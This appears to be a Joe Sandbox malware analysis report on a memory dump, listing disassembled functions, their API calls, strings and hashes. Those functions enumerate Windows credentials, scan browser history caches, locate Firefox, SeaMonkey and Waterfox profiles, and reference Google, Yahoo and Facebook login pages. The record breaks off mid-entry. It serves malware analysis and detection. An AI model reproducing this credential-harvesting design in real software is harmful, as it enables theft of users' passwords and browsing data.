                                                                                                  control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 702 44671d-446726 699->702 701 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->701 711 4467ac-4467b7 __setusermatherr 701->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 701->712 704 446747-44674b 702->704 705 446728-44672d 702->705 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 710 446755-446758 706->710 708->700 709 44673d-446745 708->709 709->710 710->701 711->712 715 446810-446819 712->715 716 44681e-446825 712->716 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 723 446834-446838 718->723 724 44683a-44683e 718->724 721 446845-44684b 719->721 722 446872-446877 719->722 727 446853-446864 GetStartupInfoW 721->727 728 44684d-446851 721->728 722->719 723->718 723->724 724->721 726 446840-446842 724->726 726->721 729 446866-44686a 727->729 730 446879-44687b 727->730 728->726 728->727 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2827331108-0
                                                                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                  Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                  • String ID: visited:
                                                                                                  • API String ID: 1157525455-1702587658
                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                  Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 free 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                                                                  APIs
                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                  • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                  • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                  Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                  • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 115830560-3916222277
                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                  Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError free 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 free 870->877 871->870 877->855
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                  • String ID: |A
                                                                                                  • API String ID: 77810686-1717621600
                                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                  Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                  • String ID: r!A
                                                                                                  • API String ID: 2791114272-628097481
                                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                  Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                  Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                  • String ID: BIN
                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                  Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 697348961-0
                                                                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                  Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                  • API String ID: 3527940856-11920434
                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                  Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                  • API String ID: 3527940856-2068335096
                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                  Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                  • API String ID: 3527940856-3369679110
                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                  Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
